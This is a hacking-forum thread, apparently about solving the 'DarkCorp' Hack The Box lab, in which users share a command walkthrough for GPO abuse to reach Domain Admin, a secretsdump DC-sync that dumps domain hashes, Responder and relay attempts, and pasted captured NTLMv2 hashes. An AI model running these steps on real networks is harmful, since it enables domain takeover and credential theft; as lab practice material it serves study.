Posts: 8
Threads: 0
Joined: Feb 2024
(Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
Posts: 33
Threads: 1
Joined: Oct 2024
(Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
User is in 172.16.18.2. Get the svc_acc's NTLM hash with responder, login and escalate your privileges to Administrator
Posts: 49
Threads: 0
Joined: Dec 2024
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote: (Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
User is in 172.16.18.2. Get the svc_acc's NTLM hash with responder, login and escalate your privileges to Administrator
Man how did you get the svc_acc hash ? I set my responder to ligolo the hash never came although I got ldap and smb shell from 172.16.20.1 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 17
Threads: 0
Joined: Jan 2025
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote: (Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
User is in 172.16.18.2. Get the svc_acc's NTLM hash with responder, login and escalate your privileges to Administrator
I've been trying that for a bit but I can only do something with it using ntlmrelayx, I've put responder on all interfaces and nothing...fatigue must be onto me.
Posts: 49
Threads: 0
Joined: Dec 2024
(Feb 10, 2025, 11:13 PM)arrogantoverlord Wrote: (Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote: (Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
User is in 172.16.18.2. Get the svc_acc's NTLM hash with responder, login and escalate your privileges to Administrator
I've been trying that for a bit but I can only do something with it using ntlmrelayx, I've put responder on all interfaces and nothing...fatigue must be onto me.
Same I just want to know if my ntlmrelayx command or responder is missing or ligolo, just can't get the hash although I am getting the shells with the `--interactive`. Must be fatigue I think too This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 14
Threads: 0
Joined: Jan 2025
(Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
After the DC sync you can get the hash for Administrator and use it to login on both .1 and .2 and fetch both flags.
Posts: 33
Threads: 1
Joined: Oct 2024
I didin't said, that I got the NTLM hash, Im also struggling with this part. I just told the way to get the User
Posts: 38
Threads: 1
Joined: Mar 2024
Feb 10, 2025, 11:32 PM
(This post was last modified: Feb 10, 2025, 11:33 PM by spamdegratis5.)
(Feb 10, 2025, 10:55 PM)samuelballsiu1 Wrote: (Feb 10, 2025, 10:39 PM)hint80h Wrote: (Feb 10, 2025, 09:45 PM)4yhg5y72jffg820j3f Wrote: Here is my PrivEsc from taylor.b.adm to Domain Admin. I didn't know any of these horrific PowerShell GPO commands, ChatGPT helped a lot here. However, using those means there is no SharpGPOAbuse dependency and thus no need to circumvent Defender on the DC.
# Login as taylor.b.adm using evil-winrm.
$ evil-winrm -i 172.16.20.1 -u taylor.b.adm -p 'XXXXXXXXXX'
# Realize taylor.b.adm is gpo_manager
whoami /all
# Check which GPOs exist on DC-01:
Get-GPO -All
# Use the "SecurityUpdates" GPO (because the other ones didn't work)
$GpoName = "SecurityUpdates"
# Add taylor.b.adm to the "Administrators" group
$Group = "Administrators"
$User = "darkcorp\taylor.b.adm"
# Modify GPO to add user to "Administrators" group
Set-GPRegistryValue -Name $GpoName -Key "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "LocalAccountTokenFilterPolicy" -Type DWord -Value 1
# Update Restricted Groups to ensure the user is added
$Gpo = Get-GPO -Name $GpoName
$GpoPath = "\\darkcorp.htb\sysvol\darkcorp.htb\Policies\{$($Gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Add-Content -Path $GpoPath -Value "[Group Membership]" -Force
Add-Content -Path $GpoPath -Value "$Group = $User"
# Force update
gpupdate /force
# DC-SYNC since now you're God:
$ impacket-secretsdump darkcorp.htb/taylor.b.adm@darkcorp.htb
# Use the hashes to harvest flags etc...
And about the user ?
User is in 172.16.18.2. Get the svc_acc's NTLM hash with responder, login and escalate your privileges to Administrator
Have you done that? Or you're just repeating what you have been told?
Btw, someone gave me this info: adcs and web enrollment to root web01. He mentioned relaying kerberos over smb using krbrelayx. I'm still looking how to apply this info. Maybe we need to exploit the CertEnroll share? Idk
Posts: 40
Threads: 0
Joined: Jul 2024
I hate people posting rabbit holes. Honestly each time we have either people just submitting flag so we say "Oh wow he is so strong" or people just giving rabbit holes purposely.... Respect to people sharing solutions so we spread knowledge !
DARKCORP\svc_acc is not admin of 172.16.20.2, So we will not be able to get a shell with it. Maybe it is local admin only ?
I don't think responder is the way, like even if we get hashes, they won't crack (cause if they do then the NTLM of svc_acc that some one posted would crack) But agree it is weird we cannot make responder work.
I think the way is Relay --> shell --> privesc --> user.txt on 172.16.20.2 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 2
Threads: 0
Joined: Jan 2025
Feb 11, 2025, 12:19 AM
(This post was last modified: Feb 11, 2025, 12:36 AM by ramleelax.)
bdw this are the ntlm-v2 hashes but they wouldn"t help i guess.
!] Error starting SSL server on port 443, check permissions or other servers running.
[HTTP] NTLMv2 Client : XX.XX.XX,XX
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash : svc_acc::darkcorp:2bd40dfbc9319823:F75EE00C7C424E578DD31413C6E06DE3:0101000000000000324FE57B157CDB01C00D24713C25838900000000020008004F0057005200450001001E00570049004E002D00590030004E005400360031003200310030004B003500040014004F005700520045002E004C004F00430041004C0003003400570049004E002D00590030004E005400360031003200310030004B0035002E004F005700520045002E004C004F00430041004C00050014004F005700520045002E004C004F00430041004C0008003000300000000000000000000000003000002F4341C14AC6BEB56BFAB7C3964CCA766E891A0A3D9A25D606DF71581B00F8770A001000000000000000000000000000000000000900300048005400540050002F007700650062002D00300032002E006400610072006B0063006F00720070002E006800740062000000000000000000
[SMB] NTLMv2-SSP Client : XX.XX.XX.XX
[SMB] NTLMv2-SSP Username : darkcorp\WEB-01$
[SMB] NTLMv2-SSP Hash : WEB-01$::darkcorp:a651ec56f939237d:E237AD013E38577025DFD70EA2D43B61:0101000000000000006E5163157CDB019BB182F2D7DA712800000000020008004F0057005200450001001E00570049004E002D00590030004E005400360031003200310030004B00350004003400570049004E002D00590030004E005400360031003200310030004B0035002E004F005700520045002E004C004F00430041004C00030014004F005700520045002E004C004F00430041004C00050014004F005700520045002E004C004F00430041004C0007000800006E5163157CDB01060004000200000008003000300000000000000000000000004000002F4341C14AC6BEB56BFAB7C3964CCA766E891A0A3D9A25D606DF71581B00F8770A001000000000000000000000000000000000000900300063006900660073002F007700650062002D00300032002E006400610072006B0063006F00720070002E006800740062000000000000000000
[*]Skipping previously captured hash for darkcorp\WEB-01$
|
